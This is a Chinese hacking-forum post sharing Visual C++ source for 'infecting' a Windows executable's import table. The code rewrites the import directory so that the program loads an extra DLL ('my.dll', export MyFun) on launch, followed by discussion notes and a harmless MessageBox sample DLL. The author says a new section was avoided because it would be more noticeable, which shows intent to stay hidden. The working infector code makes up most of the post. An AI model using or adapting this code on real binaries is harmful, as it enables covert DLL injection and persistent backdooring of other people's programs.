[原创]发一段感染引入表的vc代码
信息来源:邪恶八进制信息安全团队()
文章作者:[E.S.T] 认真的雪
- #include <stdio.h>
- #include <windows.h>
- DWORD RVAToOffset(LPVOID lpBase,DWORD VirtualAddress)
- {
- IMAGE_DOS_HEADER *dosHeader;
- IMAGE_NT_HEADERS *ntHeader;
- IMAGE_SECTION_HEADER *sectionHeader;
- int NumOfSections;
- dosHeader=(IMAGE_DOS_HEADER*)lpBase;
- ntHeader=(IMAGE_NT_HEADERS*)((BYTE*)lpBase+dosHeader->e_lfanew);
- NumOfSections=ntHeader->FileHeader.NumberOfSections;
- for (int i=0;i<NumOfSections;i++)
- {
- sectionHeader=(IMAGE_SECTION_HEADER*)((BYTE*)lpBase+dosHeader->e_lfanew+sizeof(IMAGE_NT_HEADERS))+i;
- if(VirtualAddress>sectionHeader->VirtualAddress&&VirtualAddress<sectionHeader->VirtualAddress+sectionHeader->SizeOfRawData)
- {
- DWORD AposRAV=VirtualAddress-sectionHeader->VirtualAddress;
- DWORD Offset=sectionHeader->PointerToRawData+AposRAV;
- return Offset;
- }
- }
- return 0;
- }
- int sectionNum(LPVOID lpBase,DWORD VirtualAddress)
- {
- IMAGE_DOS_HEADER *dosHeader;
- IMAGE_NT_HEADERS *ntHeader;
- IMAGE_SECTION_HEADER *sectionHeader;
- int NumOfSections;
- dosHeader=(IMAGE_DOS_HEADER*)lpBase;
- ntHeader=(IMAGE_NT_HEADERS*)((BYTE*)lpBase+dosHeader->e_lfanew);
- NumOfSections=ntHeader->FileHeader.NumberOfSections;
- for (int i=0;i<NumOfSections;i++)
- {
- sectionHeader=(IMAGE_SECTION_HEADER*)((BYTE*)lpBase+dosHeader->e_lfanew+sizeof(IMAGE_NT_HEADERS))+i;
- if(VirtualAddress>sectionHeader->VirtualAddress&&VirtualAddress<sectionHeader->VirtualAddress+sectionHeader->SizeOfRawData)
- {
- return i;
- }
- }
- return -1;
- }
- int main(int argc, char* argv[])
- {
- HANDLE hFile=CreateFile(argv[1],GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
- if(hFile==INVALID_HANDLE_VALUE)
- {
- printf("CreateFile Failed\n");
- return 0;
- }
- HANDLE hMap=CreateFileMapping(hFile,NULL,PAGE_READWRITE,NULL,NULL,NULL);
- if(hMap==INVALID_HANDLE_VALUE)
- {
- printf("CreateFileMapping Failed\n");
- return 0;
- }
- LPVOID lpBase=MapViewOfFile(hMap,FILE_MAP_WRITE,0,0,0);
- if(lpBase==NULL)
- {
- printf("MapViewOfFile Failed\n");
- return 0;
- }
- IMAGE_DOS_HEADER *dosHeader;
- IMAGE_NT_HEADERS *ntHeader;
- dosHeader=(IMAGE_DOS_HEADER*)lpBase;
- if (dosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
- {
- printf("This is not a windows file\n");
- return 0;
- }
-
- ntHeader=(IMAGE_NT_HEADERS*)((BYTE*)lpBase+dosHeader->e_lfanew);
- if(ntHeader->Signature!=IMAGE_NT_SIGNATURE)
- {
- printf("This is not a win32 file\n");
- return 0;
- }
- int numOfSections=ntHeader->FileHeader.NumberOfSections;
-
- int ncout=sectionNum(lpBase,ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
- if(ncout==-1)
- {
- printf("get section failed\n");
- return 0;
- }
- IMAGE_SECTION_HEADER *sectionHeader;
- sectionHeader=(IMAGE_SECTION_HEADER*)((BYTE*)lpBase+dosHeader->e_lfanew+sizeof(IMAGE_NT_HEADERS))+ncout;
- int nullsize=sectionHeader->SizeOfRawData-sectionHeader->Misc.VirtualSize;
- printf("%d\n",nullsize);
- IMAGE_IMPORT_DESCRIPTOR *ImportDec=(IMAGE_IMPORT_DESCRIPTOR*)((BYTE*)lpBase+RVAToOffset(lpBase,ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress));
- int i=0;
- while(ImportDec->FirstThunk)
- {
- i++;
- ImportDec++;
- }
- if(i*20+20*3+8+8>nullsize)
- {
- printf("file space is not enough\n");
- return 0;
- }
- IMAGE_IMPORT_DESCRIPTOR *newImport;
- newImport=(IMAGE_IMPORT_DESCRIPTOR *)((BYTE*)lpBase+sectionHeader->PointerToRawData+sectionHeader->Misc.VirtualSize);
- printf("%x\n",sectionHeader->PointerToRawData+sectionHeader->Misc.VirtualSize);
- printf("%d\n",sizeof(IMAGE_IMPORT_DESCRIPTOR));
- ImportDec=(IMAGE_IMPORT_DESCRIPTOR*)((BYTE*)lpBase+RVAToOffset(lpBase,ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress));
- i=0;
- while(ImportDec->FirstThunk)
- {
- *newImport=*ImportDec;
- i++;
- ImportDec++;
- newImport++;
- }
- IMAGE_IMPORT_DESCRIPTOR myImport;
- char *name="my.dll";
- myImport.FirstThunk=(DWORD)(sectionHeader->Misc.VirtualSize+sectionHeader->VirtualAddress+sizeof(IMAGE_IMPORT_DESCRIPTOR)*(i+2)+20);
- myImport.TimeDateStamp=0;
- myImport.ForwarderChain=0;
- myImport.OriginalFirstThunk=(DWORD)(sectionHeader->Misc.VirtualSize+sectionHeader->PointerToRawData+sizeof(IMAGE_IMPORT_DESCRIPTOR)*(i+2)+20);
- myImport.Name=(DWORD)(sectionHeader->Misc.VirtualSize+sectionHeader->VirtualAddress+sizeof(IMAGE_IMPORT_DESCRIPTOR)*(i+2));
- *newImport=myImport;
- newImport++;
- memset(newImport,0,sizeof(IMAGE_IMPORT_DESCRIPTOR));
- newImport++;
- memcpy((char*)newImport,name,strlen(name)+1);
- DWORD newThunk;
- newThunk=(DWORD)newImport+20;
- *(DWORD*)newThunk=(DWORD)(sectionHeader->Misc.VirtualSize+sectionHeader->VirtualAddress+sizeof(IMAGE_IMPORT_DESCRIPTOR)*(i+2)+20+8);
- memset((void*)(newThunk+4),0,4);
- newThunk=newThunk+8;
- WORD hint=0x00;
- *(WORD*)newThunk=hint;
- newThunk=newThunk+sizeof(WORD);
- char *funname="MyFun";
- memcpy((char*)newThunk,funname,strlen(funname)+2);
- ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress=sectionHeader->Misc.VirtualSize+sectionHeader->VirtualAddress;
- FlushViewOfFile(lpBase,0);
- UnmapViewOfFile(lpBase);
- CloseHandle(hMap);
- CloseHandle(hFile);
- return 0;
- }
以下是对该代码的一些讨论:
1. 不是在现有引入表结构之后添加一个新的引入表结构滴,而是把原先的的引入表写到引入表所在节的空余空间上,再加上新的引入表结构,一般来说这个长度是足够的,不是前面还做了长度大小的判断吗....加一个新节文件大小改变了,会比较明显哟,所以当时就这么写了....貌似代码是比较乱,见谅了,嘿
嘿.....
2. if(i*20+20*3+8+8>nullsize) 意思是:判断导入表所在节的末尾的剩余空间,是否足够写入所有的导入表。
3. i*20是原始导入表的大小。。。
那么后面的20*3+8+8就是my.dll所对应的IMAGE_IMPORT_DESCRIPTOR结构和这个结构中的成员所指向的数据的大小。。。。
4. 发现这段代码还是有问题,把sectionHeader->PointerToRawData改成sectionHeader->Misc.VirtualSize就行了...
5. 导出函数MyFun是否正确,使用PE查看工具或者Dependecy工具
确认不是"_MyFun@所有参数的字节数 " 的导出形式。
对于用VC制造的DLL, 最好对函数作如下声明:
------>.h
#ifdef MYDLL
#define DLLFUN _declspec(dllexport)
#else
#define DLLFUN _declspec(dllimport)
#endif
#ifdef __cplusplus
extern "C" {
#endif
DLLFUN void MyFun();
#ifdef __cplusplus
}
#endif
------>.cpp
DLLFUN void MyFun()
{
MessageBox(NULL,"just to do it , my boy","hahahah",MB_OK);
}
阅读(792) | 评论(0) | 转发(0) |